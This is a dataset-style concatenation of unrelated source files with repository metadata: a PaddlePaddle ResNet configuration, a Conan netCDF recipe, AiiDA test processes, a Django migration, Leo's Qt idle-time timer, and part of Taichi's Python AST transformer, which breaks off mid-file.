'height': height,
'width': width,
'color': True,
'num_class': num_class,
'is_infer': is_infer
}
define_py_data_sources2(
"train.list" if not is_infer else None,
"test.list" if is_infer else None,
module="provider",
obj="process",
args=args)
settings(
batch_size=batch_size,
learning_rate=0.01 / batch_size,
learning_method=MomentumOptimizer(0.9),
regularization=L2Regularization(0.0005 * batch_size))
#######################Network Configuration #############
def conv_bn_layer(name,
input,
filter_size,
num_filters,
stride,
padding,
channels=None,
active_type=ReluActivation()):
"""
A wrapper for conv layer with batch normalization layers.
Note:
conv layer has no activation.
"""
tmp = img_conv_layer(
name=name + "_conv",
input=input,
filter_size=filter_size,
num_channels=channels,
num_filters=num_filters,
stride=stride,
padding=padding,
act=LinearActivation(),
bias_attr=False)
return batch_norm_layer(
name=name + "_bn",
input=tmp,
act=active_type,
use_global_stats=is_infer)
def bottleneck_block(name, input, num_filters1, num_filters2):
"""
A wrapper for bottlenect building block in ResNet.
Last conv_bn_layer has no activation.
Addto layer has activation of relu.
"""
last_name = conv_bn_layer(
name=name + '_branch2a',
input=input,
filter_size=1,
num_filters=num_filters1,
stride=1,
padding=0)
last_name = conv_bn_layer(
name=name + '_branch2b',
input=last_name,
filter_size=3,
num_filters=num_filters1,
stride=1,
padding=1)
last_name = conv_bn_layer(
name=name + '_branch2c',
input=last_name,
filter_size=1,
num_filters=num_filters2,
stride=1,
padding=0,
active_type=LinearActivation())
return addto_layer(
name=name + "_addto", input=[input, last_name], act=ReluActivation())
def mid_projection(name, input, num_filters1, num_filters2, stride=2):
"""
A wrapper for middile projection in ResNet.
projection shortcuts are used for increasing dimensions,
and other shortcuts are identity
branch1: projection shortcuts are used for increasing
dimensions, has no activation.
branch2x: bottleneck building block, shortcuts are identity.
"""
# stride = 2
branch1 = conv_bn_layer(
name=name + '_branch1',
input=input,
filter_size=1,
num_filters=num_filters2,
stride=stride,
padding=0,
active_type=LinearActivation())
last_name = conv_bn_layer(
name=name + '_branch2a',
input=input,
filter_size=1,
num_filters=num_filters1,
stride=stride,
padding=0)
last_name = conv_bn_layer(
name=name + '_branch2b',
input=last_name,
filter_size=3,
num_filters=num_filters1,
stride=1,
padding=1)
last_name = conv_bn_layer(
name=name + '_branch2c',
input=last_name,
filter_size=1,
num_filters=num_filters2,
stride=1,
padding=0,
active_type=LinearActivation())
return addto_layer(
name=name + "_addto", input=[branch1, last_name], act=ReluActivation())
img = data_layer(name='image', size=height * width * 3)
def deep_res_net(res2_num=3, res3_num=4, res4_num=6, res5_num=3):
"""
A wrapper for 50,101,152 layers of ResNet.
res2_num: number of blocks stacked in conv2_x
res3_num: number of blocks stacked in conv3_x
res4_num: number of blocks stacked in conv4_x
res5_num: number of blocks stacked in conv5_x
"""
# For ImageNet
# conv1: 112x112
tmp = conv_bn_layer(
"conv1",
input=img,
filter_size=7,
channels=3,
num_filters=64,
stride=2,
padding=3)
tmp = img_pool_layer(name="pool1", input=tmp, pool_size=3, stride=2)
# conv2_x: 56x56
tmp = mid_projection(
name="res2_1", input=tmp, num_filters1=64, num_filters2=256, stride=1)
for i in xrange(2, res2_num + 1, 1):
tmp = bottleneck_block(
name="res2_" + str(i), input=tmp, num_filters1=64, num_filters2=256)
# conv3_x: 28x28
tmp = mid_projection(
name="res3_1", input=tmp, num_filters1=128, num_filters2=512)
for i in xrange(2, res3_num + 1, 1):
tmp = bottleneck_block(
name="res3_" + str(i),
input=tmp,
num_filters1=128,
num_filters2=512)
# conv4_x: 14x14
tmp = mid_projection(
name="res4_1", input=tmp, num_filters1=256, num_filters2=1024)
for i in xrange(2, res4_num + 1, 1):
tmp = bottleneck_block(
name="res4_" + str(i),
input=tmp,
num_filters1=256,
num_filters2=1024)
# conv5_x: 7x7
tmp = mid_projection(
name="res5_1", input=tmp, num_filters1=512, num_filters2=2048)
for i in xrange(2, res5_num + 1, 1):
tmp = bottleneck_block(
name="res5_" + str(i),
input=tmp,
num_filters1=512,
num_filters2=2048)
tmp = img_pool_layer(
name='avgpool',
input=tmp,
pool_size=7,
stride=1,
pool_type=AvgPooling())
return fc_layer(input=tmp, size=num_class, act=SoftmaxActivation())
if layer_num == 50:
resnet = deep_res_net(3, 4, 6, 3)
elif layer_num == 101:
resnet = deep_res_net(3, 4, 23, 3)
elif layer_num == 152:
resnet = deep_res_net(3, 8, 36, 3)
else:
print("Wrong layer number.")
if is_infer:
outputs(resnet)
else:
lbl = data_layer(name="label", size=num_class)
loss = cross_entropy(name='loss', input=resnet, label=lbl)
outputs(loss)
| 27.471616
| 80
| 0.608488
|
4a14367c1e66fae99c3b3f1af568c8cd27275984
| 5,578
|
py
|
Python
|
recipes/netcdf/all/conanfile.py
|
marsven/conan-center-index
|
d8bb4ad617cee02d8664e8341fa32cdf702e4284
|
[
"MIT"
] | null | null | null |
recipes/netcdf/all/conanfile.py
|
marsven/conan-center-index
|
d8bb4ad617cee02d8664e8341fa32cdf702e4284
|
[
"MIT"
] | 1
|
2021-11-22T13:54:48.000Z
|
2021-11-22T14:09:45.000Z
|
recipes/netcdf/all/conanfile.py
|
marsven/conan-center-index
|
d8bb4ad617cee02d8664e8341fa32cdf702e4284
|
[
"MIT"
] | null | null | null |
from conans import CMake, ConanFile, tools
import os
required_conan_version = ">=1.43.0"
class NetcdfConan(ConanFile):
name = "netcdf"
description = (
"The Unidata network Common Data Form (netCDF) is an interface for "
"scientific data access and a freely-distributed software library "
"that provides an implementation of the interface."
)
topics = ("unidata", "unidata-netcdf", "networking")
license = "BSD-3-Clause"
homepage = "https://github.com/Unidata/netcdf-c"
url = "https://github.com/conan-io/conan-center-index"
settings = "os", "arch", "compiler", "build_type"
options = {
"shared": [True, False],
"fPIC": [True, False],
"netcdf4": [True, False],
"with_hdf5": [True, False],
"cdf5": [True, False],
"dap": [True, False],
}
default_options = {
"shared": False,
"fPIC": True,
"netcdf4": True,
"with_hdf5": True,
"cdf5": True,
"dap": True,
}
generators = "cmake_find_package", "cmake_find_package_multi", "cmake"
_cmake = None
@property
def _with_hdf5(self):
return self.options.with_hdf5 or self.options.netcdf4
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _build_subfolder(self):
return "build_subfolder"
def export_sources(self):
self.copy("CMakeLists.txt")
for patch in self.conan_data.get("patches", {}).get(self.version, []):
self.copy(patch["patch_file"])
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
del self.options.fPIC
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
def requirements(self):
if self._with_hdf5:
self.requires("hdf5/1.12.0")
if self.options.dap:
self.requires("libcurl/7.80.0")
def source(self):
tools.get(**self.conan_data["sources"][self.version],
destination=self._source_subfolder, strip_root=True)
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
self._cmake.definitions["BUILD_TESTING"] = False
self._cmake.definitions["BUILD_UTILITIES"] = False
self._cmake.definitions["ENABLE_TESTS"] = False
self._cmake.definitions["ENABLE_NETCDF_4"] = self.options.netcdf4
self._cmake.definitions["ENABLE_CDF5"] = self.options.cdf5
self._cmake.definitions["ENABLE_DAP"] = self.options.dap
self._cmake.definitions["USE_HDF5"] = self.options.with_hdf5
self._cmake.definitions["NC_FIND_SHARED_LIBS"] = self.options.with_hdf5 and self.options["hdf5"].shared
self._cmake.configure(build_folder=self._build_subfolder)
return self._cmake
def build(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy("COPYRIGHT", src=self._source_subfolder, dst="licenses")
cmake = self._configure_cmake()
cmake.install()
os.unlink(os.path.join(self.package_folder, "bin", "nc-config"))
tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.settings")
tools.rmdir(os.path.join(self.package_folder, "lib", "cmake"))
tools.rmdir(os.path.join(self.package_folder, "lib", "pkgconfig"))
tools.rmdir(os.path.join(self.package_folder, "share"))
if self.settings.os == "Windows" and self.options.shared:
for vc_file in ["concrt*.dll", "msvcp*.dll", "vcruntime*.dll"]:
tools.remove_files_by_mask(os.path.join(self.package_folder, "bin"), vc_file)
tools.remove_files_by_mask(os.path.join(self.package_folder, "bin"), "*[!.dll]")
else:
tools.rmdir(os.path.join(self.package_folder, "bin"))
def package_info(self):
self.cpp_info.set_property("cmake_file_name", "netCDF")
self.cpp_info.set_property("cmake_target_name", "netCDF::netcdf")
self.cpp_info.set_property("pkg_config_name", "netcdf")
# TODO: back to global scope in conan v2 once cmake_find_package_* generators removed
self.cpp_info.components["libnetcdf"].libs = ["netcdf"]
if self._with_hdf5:
self.cpp_info.components["libnetcdf"].requires.append("hdf5::hdf5")
if self.options.dap:
self.cpp_info.components["libnetcdf"].requires.append("libcurl::libcurl")
if self.settings.os in ["Linux", "FreeBSD"]:
self.cpp_info.components["libnetcdf"].system_libs = ["dl", "m"]
elif self.settings.os == "Windows":
if self.options.shared:
self.cpp_info.components["libnetcdf"].defines.append("DLL_NETCDF")
# TODO: to remove in conan v2 once cmake_find_package_* generators removed
self.cpp_info.names["cmake_find_package"] = "netCDF"
self.cpp_info.names["cmake_find_package_multi"] = "netCDF"
self.cpp_info.components["libnetcdf"].names["cmake_find_package"] = "netcdf"
self.cpp_info.components["libnetcdf"].names["cmake_find_package_multi"] = "netcdf"
self.cpp_info.components["libnetcdf"].set_property("cmake_target_name", "netCDF::netcdf")
self.cpp_info.components["libnetcdf"].set_property("pkg_config_name", "netcdf")
| 39.842857
| 111
| 0.639297
|
4a14379256198dcdef5568f6952aad7a71aae237
| 2,385
|
py
|
Python
|
aiida/backends/tests/utils/processes.py
|
PercivalN/aiida-core
|
b215ed5a7ce9342bb7f671b67e95c1f474cc5940
|
[
"BSD-2-Clause"
] | 1
|
2019-07-31T04:08:13.000Z
|
2019-07-31T04:08:13.000Z
|
aiida/backends/tests/utils/processes.py
|
PercivalN/aiida-core
|
b215ed5a7ce9342bb7f671b67e95c1f474cc5940
|
[
"BSD-2-Clause"
] | null | null | null |
aiida/backends/tests/utils/processes.py
|
PercivalN/aiida-core
|
b215ed5a7ce9342bb7f671b67e95c1f474cc5940
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Utilities for testing components from the workflow engine"""
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import plumpy
from aiida.orm import Data, WorkflowNode
from aiida.engine import Process
class DummyProcess(Process):
"""A Process that does nothing when it runs."""
_node_class = WorkflowNode
@classmethod
def define(cls, spec):
super(DummyProcess, cls).define(spec)
spec.inputs.valid_type = Data
spec.outputs.valid_type = Data
def run(self):
pass
class AddProcess(Process):
"""A simple Process that adds two integers."""
_node_class = WorkflowNode
@classmethod
def define(cls, spec):
super(AddProcess, cls).define(spec)
spec.input('a', required=True)
spec.input('b', required=True)
spec.output('result', required=True)
def run(self):
summed = self.inputs.a + self.inputs.b
self.out(summed.store())
class BadOutput(Process):
"""A Process that emits an output that isn't an AiiDA Data type."""
_node_class = WorkflowNode
@classmethod
def define(cls, spec):
super(BadOutput, cls).define(spec)
spec.outputs.valid_type = Data
def run(self):
self.out("bad_output", 5)
class ExceptionProcess(Process):
"""A Process that raises a RuntimeError when run."""
_node_class = WorkflowNode
def run(self): # pylint: disable=no-self-use
raise RuntimeError('CRASH')
class WaitProcess(Process):
"""A Process that waits until it is asked to continue."""
_node_class = WorkflowNode
def run(self):
return plumpy.Wait(self.next_step)
def next_step(self):
pass
| 27.732558
| 75
| 0.588679
|
4a1437b64c3429ddbce4181cbf6e22dcb14d841d
| 5,199
|
py
|
Python
|
waldur_core/cost_tracking/migrations/0001_squashed_0012_fix_fields_length.py
|
PrintScr/waldur-core
|
db9f46619984d9c1e8b62f1aba89a69369ade08a
|
[
"MIT"
] | null | null | null |
waldur_core/cost_tracking/migrations/0001_squashed_0012_fix_fields_length.py
|
PrintScr/waldur-core
|
db9f46619984d9c1e8b62f1aba89a69369ade08a
|
[
"MIT"
] | null | null | null |
waldur_core/cost_tracking/migrations/0001_squashed_0012_fix_fields_length.py
|
PrintScr/waldur-core
|
db9f46619984d9c1e8b62f1aba89a69369ade08a
|
[
"MIT"
] | 1
|
2018-07-26T15:47:23.000Z
|
2018-07-26T15:47:23.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import waldur_core.core.fields
import django.core.validators
import waldur_core.core.validators
class Migration(migrations.Migration):
replaces = [('cost_tracking', '0001_initial'), ('cost_tracking', '0002_price_list'), ('cost_tracking', '0003_new_price_list_items'), ('cost_tracking', '0004_remove_connection_to_resource'), ('cost_tracking', '0005_expand_item_type_size'), ('cost_tracking', '0006_add_backend_cache_fields_to_pricelist'), ('cost_tracking', '0007_remove_obsolete_billing_fields'), ('cost_tracking', '0008_delete_resourceusage'), ('cost_tracking', '0009_defaultpricelistitem_name'), ('cost_tracking', '0010_applicationtype'), ('cost_tracking', '0011_applicationtype_slug'), ('cost_tracking', '0012_fix_fields_length')]
dependencies = [
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='PriceEstimate',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('uuid', waldur_core.core.fields.UUIDField()),
('object_id', models.PositiveIntegerField()),
('total', models.FloatField(default=0)),
('details', waldur_core.core.fields.JSONField(blank=True)),
('month', models.PositiveSmallIntegerField(validators=[django.core.validators.MaxValueValidator(12), django.core.validators.MinValueValidator(1)])),
('year', models.PositiveSmallIntegerField()),
('is_manually_input', models.BooleanField(default=False)),
('is_visible', models.BooleanField(default=True)),
('content_type', models.ForeignKey(to='contenttypes.ContentType')),
],
options={
'unique_together': set([('content_type', 'object_id', 'month', 'year', 'is_manually_input')]),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='PriceListItem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('uuid', waldur_core.core.fields.UUIDField()),
('content_type', models.ForeignKey(to='contenttypes.ContentType')),
('object_id', models.PositiveIntegerField()),
('key', models.CharField(max_length=255)),
('value', models.DecimalField(default=0, verbose_name=b'Hourly rate', max_digits=9, decimal_places=2)),
('units', models.CharField(max_length=255, blank=True)),
('item_type', models.CharField(default=b'flavor', max_length=255, choices=[(b'flavor', b'flavor'), (b'storage', b'storage'), (b'license-application', b'license-application'), (b'license-os', b'license-os'), (b'support', b'support'), (b'network', b'network'), (b'usage', b'usage'), (b'users', b'users')])),
('is_manually_input', models.BooleanField(default=False)),
('resource_content_type', models.ForeignKey(related_name='+', default=None, to='contenttypes.ContentType')),
],
options={
'unique_together': set([('key', 'content_type', 'object_id')]),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DefaultPriceListItem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=150, verbose_name='name', validators=[waldur_core.core.validators.validate_name])),
('uuid', waldur_core.core.fields.UUIDField()),
('key', models.CharField(max_length=255)),
('value', models.DecimalField(default=0, verbose_name=b'Hourly rate', max_digits=9, decimal_places=2)),
('units', models.CharField(max_length=255, blank=True)),
('item_type', models.CharField(default=b'flavor', max_length=255, choices=[(b'flavor', b'flavor'), (b'storage', b'storage'), (b'license-application', b'license-application'), (b'license-os', b'license-os'), (b'support', b'support'), (b'network', b'network'), (b'usage', b'usage'), (b'users', b'users')])),
('resource_content_type', models.ForeignKey(default=None, to='contenttypes.ContentType')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ApplicationType',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=150, verbose_name='name', validators=[waldur_core.core.validators.validate_name])),
('slug', models.CharField(unique=True, max_length=150)),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
]
| 59.079545
| 602
| 0.611271
|
4a1437d4be9cf29eaec7052a8a21bb1d7476eb51
| 5,235
|
py
|
Python
|
leo/plugins/qt_idle_time.py
|
thomasbuttler/leo-editor
|
c1bddc31313b7788f0d6583dcb4ab75db73e9a09
|
[
"MIT"
] | 1,550
|
2015-01-14T16:30:37.000Z
|
2022-03-31T08:55:58.000Z
|
leo/plugins/qt_idle_time.py
|
thomasbuttler/leo-editor
|
c1bddc31313b7788f0d6583dcb4ab75db73e9a09
|
[
"MIT"
] | 2,009
|
2015-01-13T16:28:52.000Z
|
2022-03-31T18:21:48.000Z
|
leo/plugins/qt_idle_time.py
|
thomasbuttler/leo-editor
|
c1bddc31313b7788f0d6583dcb4ab75db73e9a09
|
[
"MIT"
] | 200
|
2015-01-05T15:07:41.000Z
|
2022-03-07T17:05:01.000Z
|
# -*- coding: utf-8 -*-
#@+leo-ver=5-thin
#@+node:ekr.20140907103315.18777: * @file ../plugins/qt_idle_time.py
#@@first
"""Leo's Qt idle-time code."""
import time
from leo.core import leoGlobals as g
from leo.core.leoQt import QtCore
#@+others
#@+node:ekr.20141028061518.24: ** class IdleTime
class IdleTime:
"""
A class that executes a handler with a given delay at idle time. The
handler takes a single argument, the IdleTime instance::
def handler(timer):
\"""IdleTime handler. timer is an IdleTime instance.\"""
delta_t = timer.time-timer.starting_time
g.trace(timer.count,timer.c.shortFileName(),'%2.4f' % (delta_t))
if timer.count >= 5:
g.trace('done')
timer.stop()
# Execute handler every 500 msec. at idle time.
timer = g.IdleTime(c,handler,delay=500)
if timer: timer.start()
Timer instances are completely independent::
def handler1(timer):
delta_t = timer.time-timer.starting_time
g.trace('%2s %s %2.4f' % (timer.count,timer.c.shortFileName(),delta_t))
if timer.count >= 5:
g.trace('done')
timer.stop()
def handler2(timer):
delta_t = timer.time-timer.starting_time
g.trace('%2s %s %2.4f' % (timer.count,timer.c.shortFileName(),delta_t))
if timer.count >= 10:
g.trace('done')
timer.stop()
timer1 = g.IdleTime(c,handler1,delay=500)
timer2 = g.IdleTime(c,handler2,delay=1000)
if timer1 and timer2:
timer1.start()
timer2.start()
"""
#@+others
#@+node:ekr.20140825042850.18406: *3* IdleTime.__init__
def __init__(self, handler, delay=500, tag=None):
"""ctor for IdleTime class."""
# For use by handlers...
self.count = 0
# The number of times handler has been called.
self.starting_time = None
# Time that the timer started.
self.time = None
# Time that the handle is called.
self.tag = tag
# An arbitrary string/object for use during debugging.
# For use by the IdleTime class...
self.delay = delay
# The argument to self.timer.start:
# 0 for idle time, otherwise a delay in msec.
self.enabled = False
# True: run the timer continuously.
self.handler = handler
# The user-provided idle-time handler.
self.waiting_for_idle = False
# True if we have already waited for the minimum delay\
# Create the timer, but do not fire it.
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.at_idle_time)
# Add this instance to the global idle_timers.list.
# This reference prevents this instance from being destroyed.
g.app.idle_timers.append(self)
#@+node:ekr.20140825102404.18525: *3* IdleTime.__repr__
def __repr__(self):
"""IdleTime repr."""
tag = self.tag
if tag:
return f"<IdleTime: {tag if isinstance(tag, str) else repr(tag)}>"
return f"<IdleTime: id: {id(self)}>"
__str__ = __repr__
#@+node:ekr.20140825042850.18407: *3* IdleTime.at_idle_time
def at_idle_time(self):
"""Call self.handler not more than once every self.delay msec."""
if g.app.killed:
self.stop()
elif self.enabled:
if self.waiting_for_idle:
# At idle time: call the handler.
self.call_handler()
# Requeue the timer with the appropriate delay.
# 0 means wait until idle time.
self.waiting_for_idle = not self.waiting_for_idle
if self.timer.isActive():
self.timer.stop()
self.timer.start(0 if self.waiting_for_idle else self.delay)
elif self.timer.isActive():
self.timer.stop()
#@+node:ekr.20140825042850.18408: *3* IdleTime.call_handler
def call_handler(self):
"""Carefully call the handler."""
try:
self.count += 1
self.time = time.time()
self.handler(self)
except Exception:
g.es_exception()
self.stop()
#@+node:ekr.20140825080012.18529: *3* IdleTime.destroy_self
def destroy_self(self):
"""Remove the instance from g.app.idle_timers."""
if not g.app.killed and self in g.app.idle_timers:
g.app.idle_timers.remove(self)
#@+node:ekr.20140825042850.18409: *3* IdleTime.start & stop
def start(self):
"""Start idle-time processing"""
self.enabled = True
if self.starting_time is None:
self.starting_time = time.time()
# Wait at least self.delay msec, then wait for idle time.
self.last_delay = self.delay
self.timer.start(self.delay)
def stop(self):
"""Stop idle-time processing. May be called during shutdown."""
self.enabled = False
if hasattr(self, 'timer') and self.timer.isActive():
self.timer.stop()
#@-others
#@-others
#@@language python
#@@tabwidth -4
#@@pagewidth 70
#@-leo
| 37.12766
| 83
| 0.587966
|
4a1438daad2371b1e6b1c2a571ceec2ea163170d
| 45,224
|
py
|
Python
|
python/taichi/lang/ast/ast_transformer.py
|
mzmzm/taichi
|
39129820a922fdd936728d6feb7944ae208345a5
|
[
"MIT"
] | null | null | null |
python/taichi/lang/ast/ast_transformer.py
|
mzmzm/taichi
|
39129820a922fdd936728d6feb7944ae208345a5
|
[
"MIT"
] | null | null | null |
python/taichi/lang/ast/ast_transformer.py
|
mzmzm/taichi
|
39129820a922fdd936728d6feb7944ae208345a5
|
[
"MIT"
] | null | null | null |
import ast
import collections.abc
import inspect
import os
import warnings
from collections import ChainMap
from sys import version_info
import astor
from taichi._lib import core as _ti_core
from taichi._lib.utils import package_root
from taichi.lang import expr, impl, kernel_arguments, kernel_impl, matrix, mesh
from taichi.lang import ops as ti_ops
from taichi.lang._ndrange import ndrange
from taichi.lang.ast.ast_transformer_utils import Builder, LoopStatus
from taichi.lang.ast.symbol_resolver import ASTResolver
from taichi.lang.exception import TaichiSyntaxError
from taichi.lang.matrix import MatrixType
from taichi.lang.util import is_taichi_class, to_taichi_type
from taichi.types import annotations, primitive_types
from taichi import linalg
if version_info < (3, 9):
from astunparse import unparse
else:
from ast import unparse
class ASTTransformer(Builder):
@staticmethod
def build_Name(ctx, node):
node.ptr = ctx.get_var_by_name(node.id)
return node.ptr
@staticmethod
def build_AnnAssign(ctx, node):
build_stmt(ctx, node.value)
build_stmt(ctx, node.annotation)
is_static_assign = isinstance(
node.value, ast.Call) and node.value.func.ptr is impl.static
node.ptr = ASTTransformer.build_assign_annotated(
ctx, node.target, node.value.ptr, is_static_assign,
node.annotation.ptr)
return node.ptr
@staticmethod
def build_assign_annotated(ctx, target, value, is_static_assign,
annotation):
"""Build an annotated assginment like this: target: annotation = value.
Args:
ctx (ast_builder_utils.BuilderContext): The builder context.
target (ast.Name): A variable name. `target.id` holds the name as
a string.
annotation: A type we hope to assign to the target
value: A node representing the value.
is_static_assign: A boolean value indicating whether this is a static assignment
"""
is_local = isinstance(target, ast.Name)
anno = impl.expr_init(annotation)
if is_static_assign:
raise TaichiSyntaxError(
"Static assign cannot be used on annotated assignment")
if is_local and not ctx.is_var_declared(target.id):
var = ti_ops.cast(value, anno)
var = impl.expr_init(var)
ctx.create_variable(target.id, var)
else:
var = build_stmt(ctx, target)
if var.ptr.get_ret_type() != anno:
raise TaichiSyntaxError(
"Static assign cannot have type overloading")
var.assign(value)
return var
@staticmethod
def build_Assign(ctx, node):
build_stmt(ctx, node.value)
is_static_assign = isinstance(
node.value, ast.Call) and node.value.func.ptr is impl.static
# Keep all generated assign statements and compose single one at last.
# The variable is introduced to support chained assignments.
# Ref https://github.com/taichi-dev/taichi/issues/2659.
for node_target in node.targets:
ASTTransformer.build_assign_unpack(ctx, node_target,
node.value.ptr,
is_static_assign)
return None
@staticmethod
def build_assign_unpack(ctx, node_target, values, is_static_assign):
"""Build the unpack assignments like this: (target1, target2) = (value1, value2).
The function should be called only if the node target is a tuple.
Args:
ctx (ast_builder_utils.BuilderContext): The builder context.
node_target (ast.Tuple): A list or tuple object. `node_target.elts` holds a
list of nodes representing the elements.
values: A node/list representing the values.
is_static_assign: A boolean value indicating whether this is a static assignment
"""
if not isinstance(node_target, ast.Tuple):
return ASTTransformer.build_assign_basic(ctx, node_target, values,
is_static_assign)
targets = node_target.elts
tmp_tuple = values if is_static_assign else impl.expr_init_list(
values, len(targets))
for i, target in enumerate(targets):
ASTTransformer.build_assign_basic(ctx, target, tmp_tuple[i],
is_static_assign)
return None
@staticmethod
def build_assign_basic(ctx, target, value, is_static_assign):
"""Build basic assginment like this: target = value.
Args:
ctx (ast_builder_utils.BuilderContext): The builder context.
target (ast.Name): A variable name. `target.id` holds the name as
a string.
value: A node representing the value.
is_static_assign: A boolean value indicating whether this is a static assignment
"""
is_local = isinstance(target, ast.Name)
if is_static_assign:
if not is_local:
raise TaichiSyntaxError(
"Static assign cannot be used on elements in arrays")
ctx.create_variable(target.id, value)
var = value
elif is_local and not ctx.is_var_declared(target.id):
var = impl.expr_init(value)
ctx.create_variable(target.id, var)
else:
var = build_stmt(ctx, target)
var.assign(value)
return var
@staticmethod
def build_NamedExpr(ctx, node):
build_stmt(ctx, node.value)
is_static_assign = isinstance(
node.value, ast.Call) and node.value.func.ptr is impl.static
node.ptr = ASTTransformer.build_assign_basic(ctx, node.target,
node.value.ptr,
is_static_assign)
return node.ptr
@staticmethod
def is_tuple(node):
if isinstance(node, ast.Tuple):
return True
if isinstance(node, ast.Index) and isinstance(node.value.ptr, tuple):
return True
if isinstance(node.ptr, tuple):
return True
return False
@staticmethod
def build_Subscript(ctx, node):
build_stmt(ctx, node.value)
build_stmt(ctx, node.slice)
if not ASTTransformer.is_tuple(node.slice):
node.slice.ptr = [node.slice.ptr]
node.ptr = impl.subscript(node.value.ptr, *node.slice.ptr)
return node.ptr
@staticmethod
def build_Tuple(ctx, node):
build_stmts(ctx, node.elts)
node.ptr = tuple(elt.ptr for elt in node.elts)
return node.ptr
@staticmethod
def build_List(ctx, node):
build_stmts(ctx, node.elts)
node.ptr = [elt.ptr for elt in node.elts]
return node.ptr
@staticmethod
def build_Dict(ctx, node):
dic = {}
for key, value in zip(node.keys, node.values):
if key is None:
dic.update(build_stmt(ctx, value))
else:
dic[build_stmt(ctx, key)] = build_stmt(ctx, value)
node.ptr = dic
return node.ptr
@staticmethod
def process_listcomp(ctx, node, result):
result.append(build_stmt(ctx, node.elt))
@staticmethod
def process_dictcomp(ctx, node, result):
key = build_stmt(ctx, node.key)
value = build_stmt(ctx, node.value)
result[key] = value
@staticmethod
def process_generators(ctx, node, now_comp, func, result):
if now_comp >= len(node.generators):
return func(ctx, node, result)
with ctx.static_scope_guard():
_iter = build_stmt(ctx, node.generators[now_comp].iter)
for value in _iter:
with ctx.variable_scope_guard():
ASTTransformer.build_assign_unpack(
ctx, node.generators[now_comp].target, value, True)
with ctx.static_scope_guard():
build_stmts(ctx, node.generators[now_comp].ifs)
ASTTransformer.process_ifs(ctx, node, now_comp, 0, func,
result)
return None
@staticmethod
def process_ifs(ctx, node, now_comp, now_if, func, result):
if now_if >= len(node.generators[now_comp].ifs):
return ASTTransformer.process_generators(ctx, node, now_comp + 1,
func, result)
cond = node.generators[now_comp].ifs[now_if].ptr
if cond:
ASTTransformer.process_ifs(ctx, node, now_comp, now_if + 1, func,
result)
return None
@staticmethod
def build_ListComp(ctx, node):
result = []
ASTTransformer.process_generators(ctx, node, 0,
ASTTransformer.process_listcomp,
result)
node.ptr = result
return node.ptr
@staticmethod
def build_DictComp(ctx, node):
result = {}
ASTTransformer.process_generators(ctx, node, 0,
ASTTransformer.process_dictcomp,
result)
node.ptr = result
return node.ptr
@staticmethod
def build_Index(ctx, node):
node.ptr = build_stmt(ctx, node.value)
return node.ptr
@staticmethod
def build_Constant(ctx, node):
node.ptr = node.value
return node.ptr
@staticmethod
def build_Num(ctx, node):
node.ptr = node.n
return node.ptr
@staticmethod
def build_Str(ctx, node):
node.ptr = node.s
return node.ptr
@staticmethod
def build_Bytes(ctx, node):
node.ptr = node.s
return node.ptr
@staticmethod
def build_NameConstant(ctx, node):
node.ptr = node.value
return node.ptr
@staticmethod
def build_keyword(ctx, node):
build_stmt(ctx, node.value)
if node.arg is None:
node.ptr = node.value.ptr
else:
node.ptr = {node.arg: node.value.ptr}
return node.ptr
@staticmethod
def build_Starred(ctx, node):
node.ptr = build_stmt(ctx, node.value)
return node.ptr
@staticmethod
def build_JoinedStr(ctx, node):
str_spec = ''
args = []
for sub_node in node.values:
if isinstance(sub_node, ast.FormattedValue):
str_spec += '{}'
args.append(build_stmt(ctx, sub_node.value))
elif isinstance(sub_node, ast.Constant):
str_spec += sub_node.value
elif isinstance(sub_node, ast.Str):
str_spec += sub_node.s
else:
raise TaichiSyntaxError("Invalid value for fstring.")
args.insert(0, str_spec)
node.ptr = impl.ti_format(*args)
return node.ptr
@staticmethod
def build_call_if_is_builtin(node, args, keywords):
func = node.func.ptr
replace_func = {
id(print): impl.ti_print,
id(min): ti_ops.ti_min,
id(max): ti_ops.ti_max,
id(int): impl.ti_int,
id(float): impl.ti_float,
id(any): ti_ops.ti_any,
id(all): ti_ops.ti_all,
id(abs): abs,
id(pow): pow,
}
if id(func) in replace_func:
node.ptr = replace_func[id(func)](*args, **keywords)
return True
return False
@staticmethod
def warn_if_is_external_func(ctx, node):
func = node.func.ptr
if ctx.is_in_static_scope(): # allow external function in static scope
return
if hasattr(func, "_is_taichi_function") or hasattr(
func, "_is_wrapped_kernel"): # taichi func/kernel
return
if hasattr(func, "is_taichi_class"): # Matrix/Struct
return
try:
file = inspect.getfile(inspect.getmodule(func))
except TypeError:
file = None
if file and os.path.commonpath(
[file, package_root]) == package_root: # functions inside taichi
return
name = unparse(node.func).strip()
warnings.warn_explicit(
f'Calling non-taichi function "{name}". '
f'Scope inside the function is not processed by the Taichi AST transformer. '
f'The function may not work as expected. Proceed with caution! '
f'Maybe you can consider turning it into a @ti.func?', UserWarning,
ctx.file, node.lineno + ctx.lineno_offset)
@staticmethod
def build_Call(ctx, node):
